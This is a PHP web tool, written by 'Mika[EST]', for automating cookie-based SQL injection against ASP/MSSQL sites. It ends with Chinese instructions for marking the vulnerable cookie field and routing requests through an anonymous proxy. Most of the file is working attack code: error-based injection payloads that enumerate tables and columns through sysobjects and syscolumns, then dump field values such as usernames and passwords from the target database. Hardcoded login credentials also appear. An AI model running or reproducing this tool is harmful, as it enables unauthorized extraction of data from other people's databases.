MSSQL cookie注入工具[web版]

$auth_ok=0;
$user=$_SERVER['PHP_AUTH_USER'];
$pass=$_SERVER['PHP_AUTH_PW'];
if(isset($user) && isset($pass) && $user=='admin' && $pass=='mika520'){
$auth_ok=1;
}
if(!$auth_ok)
{
      header('WWW-Authenticate: Basic realm="Top Secret Area"');
      header('HTTP/1.0 401 Unauthorized');
      exit;
}
$cookie=$_POST['_cookie'];
$referer=$_POST['_referer'];
$url=$_POST['_url'];
$t_name=$_POST['_tablename'];
$tab_name=$_POST['_tabname'];
$field_name=$_POST['_fieldname'];
$proxy=$_POST['_proxy'];
$useproxy=$_POST['_useproxy'];
$_action=$_POST['_action'];
$_btype=$_POST['_btype'];
?>

Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]

---

---

Exploitable Url:    unspecifiedn"?>

Exploitable Cookie:    unspecifiedn"?>

Referer Url:    unspecifiedn"?>

>Num Type   >Char Type

οnclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables Of Current DataBase

>Explode Fields Of   />

>Explode Values Of   /> IN />

>Via Anonymous Proxy   >

---

---

///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
global $curl,$referer,$cookie,$url,$table_name,$field_name,$t_name,$tab_name;
 
$tab_exp="%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--";
$field_exp="%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--";
$value_exp="%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--";
$count_exp="%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--";
$count_table="%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--";
$count_column="%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
if(array_key_exists("_submit",$_POST) && !empty($url) && !empty($cookie) && !empty($referer)){
$bstr=$_POST['_btype'];
$action=$_POST['_action'];
 
echo "

:::Attack Parameters:::
n";
echo "Target Url:$url
n";
echo "Target Cookie:"$cookie"
n";
echo "Referer Url:$referer
n";
echo "Injection Type:";
 
switch($bstr){
case 'num':
      echo "number
n";
      $bstr=0;//数字型
      break;
case 'char':
      echo "character
n";
      $bstr=1;//字符型
      break;
}
echo "Via Proxy:".((isset($useproxy) && !empty($proxy))? 'Yes':'No')."
n";
if(isset($useproxy) && !empty($proxy))
echo "Proxy Address:$proxy
n";
echo "Injection Action:";
 
switch($action){
case 'exp_tabs':
      echo "Explode Table Names
n

n";
      exploit_tab();
      break;
case 'exp_fields':
      echo "Explode Table Fields
n";
      if(empty($t_name))
      die("Error:table name must be specified!
");
      $table_name=$t_name;
      echo "Table Name:$table_name
n

n";
      exploit_field();
      break;
case 'exp_values':
      echo "Explode Table Values
n";
      if(empty($tab_name))
      die("Error:table name must be specified!
");
      elseif(empty($field_name))
      die("Error:field name must be specified!
");
      $table_name=$tab_name;
      echo "Table Name:$table_name
n";
      echo "Fields Name:".str_replace(","," ",$field_name)."
n

n";
      explode_value();
      break;
}
}
//      exploit_tab();
//      exploit_field();
//      explode_value();
///////////////////////////////////////////////////////////////////////////////////////
function output_start()
{
echo "

---

n";
echo "

n";
echo "n";
flush();
}
function output_th($th)
{
      switch($th){
      case 'tr':
            echo "";
            break;
      case '/tr':
            echo "n";
            break;
      default:
            echo "n";
            break;
      }
flush();
}
function output_td($td)
{
switch($td){
      case 'tr':
            echo "";
            break;
      case '/tr':
            echo "n";
            break;
      default:
            echo "n";
            break;
      }
flush();
}
function output_end()
{
echo "

$th
$td

n";
flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段值函数
function explode_value()
{
global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl;
$i=1;
$count=0;
$fields=explode(",",$field_name);
$sql_str=" And (Select Top 1 nchar(124)";
$sub_str='+isNull(cast([MIKA_FIELD] as varchar(8000)),char(32))';
foreach($fields as $field){
$new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str);
$sql_str.=$new_sub_str."+char(92)";
}
$sql_str=substr($sql_str,0,strlen($sql_str)-9);
$sql_str.="+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by ";
$sub_str="MIKA_FIELD desc";
foreach($fields as $field){
$sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str);
}
$sql_str.=implode(",",$sub_strs).")>0--";
//echo $sql_str."n";
$sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str);
 
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
output_start();
$re=find_value($new_cookie);
if($re)
{
$count=$re;
echo "the number of record in $table_name: $countn";
}
output_th('tr');
foreach ($fields as $field){
output_th($field);
}
output_th('/tr');
do{
 
$new_sql_str=str_replace('MIKA_NUM',$i,$sql_str);
//echo $sql_str."n";
if($bstr)
$new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie);
$re=find_value($new_cookie);
output_td('tr');
if($re)
{
      $res=explode("\",$re);
      foreach($res as $ree){
      output_td($ree);
      }
}
output_td('/tr');
$i++;
}while($i<=$count);
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//另一种方式暴取表名的函数
function explode_tab(){
global $bstr,$curl,$cookie;
$num=1;
$i=0;
$old_re="";
$re="";
$words=" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--";
init_session();
 
output_th('tr');
for($i=0;$i<8;$i++)
output_th('Tables');
output_th('/tr');
output_td('tr');
do{
$new_words=str_replace('MIKA_NUM',$num,$words);
if($bstr)
$new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_words),$cookie);
$re=find_value($new_cookie);
if($re!=$old_re)
      {
output_td($re);
if(($num % 8)==0)
{
output_td('/tr');
output_td('tr');
}
      }
else
break;
$old_re=$re;
$num++;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//初始化会话函数
function init_session(){
global $proxy,$curl,$referer,$url;
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
if(isset($useproxy) && !empty($proxy))
curl_setopt($curl,CURLOPT_PROXY,"$proxy");
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//通用取值函数
function find_value($cookie){
global $curl;
//echo $cookie."n";
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
 
//echo $content;
$re=preg_match("/(|.+|)/i",$content,$result);
if($re)
{
return str_replace('|','',$result[1]);
}
return 0;
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//字符串转换为msssql的16进制数值
 
function str2sqlhex($str){
$temp="0x";
for($i=0;$i //echo $str[$i]."n";
$temp.=dechex(ord($str[$i]))."00";
}
//echo $temp."n";
return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//暴取表名函数
 
function exploit_tab(){
global $bstr,$cookie,$tab_exp,$count_table,$curl;
$table=Null;
$temp=Null;
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_table,$cookie);
else
$new_cookie=str_replace('MIKA',$count_table,$cookie);
output_start();
if($re=find_value($new_cookie)){
echo "Number of tables:$ren";
}
/*do{
if($table==Null){
$new_url=str_replace('MFM_TABLES',"''",$tab_exp);
}
else{
$new_url=str_replace('MFM_TABLES',$temp,$tab_exp);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
 
$re=find_value($new_cookie);
if($re)
{
$table=$re;
if($temp==Null){
//$temp="'".$table."'";
$temp=str2sqlhex($table);
}else{
//$temp.=","."'".$table."'";
$temp.=",".str2sqlhex($table);
}
fputs($table_file,"|------------+".$table."n");
echo "|------------+".$table."n";
}
}while($re);*/
explode_tab();
 
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段函数
function exploit_field(){
global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl;
$old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp);
$count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column);
$num=1;
$i=0;
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$count_column,$cookie);
else
$new_cookie=str_replace('MIKA',$count_column,$cookie);
output_start();
if($re=find_value($new_cookie)){
echo "Number of columns in $table_name:$ren";
}
output_th('tr');
for($i=0;$i<4;$i++)
output_th('Fields');
output_th('/tr');
output_td('tr');
do{
$temp=$old_url;
$new_url=str_replace('MFM_NUM',"$num",$temp);
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
//echo $new_url."n";
$re=find_value($new_cookie);
if($re){
output_td($re);
if(($num % 4)==0)
{
      output_td('/tr');
      output_td('tr');
}
}
$num++;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////////////////////////
//老方式暴取字段值的函数
function exploit_value(){
global $bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl;
$value=Null;
$temp=Null;
$count_num=1;
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
 
$re=find_value($new_cookie);
$record_file=fopen("records-$field_name.txt","w");
if($re)
{
$count=$re;
echo "the number of record in $table_name is: $countn";
fputs($record_file,"the number of record in $table_name is: $countn");
}
 
$old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp);
$old=str_replace('MFM_TABLE_NAME',$table_name,$old);
//echo $old."n";
do{
if($value==Null){
$new_url=str_replace('MFM_VALUE',"''",$old);
}
else{
$new_url=str_replace('MFM_VALUE',$temp,$old);
}
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$new_url,$cookie);
else
$new_cookie=str_replace('MIKA',$new_url,$cookie);
 
$re=find_value($new_cookie);
if($re)
{
$value=$re;
echo "|------------+ ".$value."n";
fputs($record_file,"|------------+ ".$value."n");
if($temp==Null){
//$temp="'".urlencode($value)."'";
//$temp=urlencode("'".urlencode($value)."'");
$temp=str2sqlhex($value);
//echo $temp."n";
}else{
//$temp.=","."'".urlencode($value)."'";
//$temp.=",".urlencode("'".urlencode($value)."'");
$temp.=",".str2sqlhex($value);
}
}else{echo "|------------+ Nonen";
fputs($record_file,"|------------+ Nonen");}
$count_num++;
}while($count_num<=$count);
fclose($record_file);
}
///////////////////////////////////////////////////////////////////////////////////////
?>
if(!array_key_exists('_submit',$_POST)){
?>

cookie注入辅助工具 by mika[EST]

只针对mssql数据库，且错误提示开启。

用法非常简单：

首先将实际获得cookie填入"exploitable cookie"栏里。并将可注入的字段后面加上MIKA这
个关键字，如下例所示，不要有空格。比如下面这个cookie：

"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"

其中myset这个字段没有过滤好，存在注入漏洞，那么你就需要在template后面加上MIKA这个关键字
因此$cookie全局变量就成了如下这个样子：

$cookie="my web=myset=templateMIKA; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";

"Exploitable Url"填存在漏洞的页面url地址。"referer url"填写http头里的referer字段的内容，一般情况下跟"Exploitable Url"
一样就可以了。


"Num Type"和"Char Type"是注入的类型，前者代表数值型，后者代表字符型，根据实际情况填写即可。

"Explode Tables Of Current DataBase" 爆取当前数据库的所有表名。

"Explode Fields Of" 爆取某个表的字段值，后面填上要暴取字段的表名.

"Explode Values Of" 暴取某个表的字段值。后面两个文本框，从左到又依次填写字段名和表名。其中字段数可以一次填写多个，以逗号(",")隔开，比如:

username,password,userid

"Via Anonymous Proxy" 是选择是否使用匿名HTTP代理，代理地址格式为"127.0.0.1:8080".


by mika[EST]

}
?>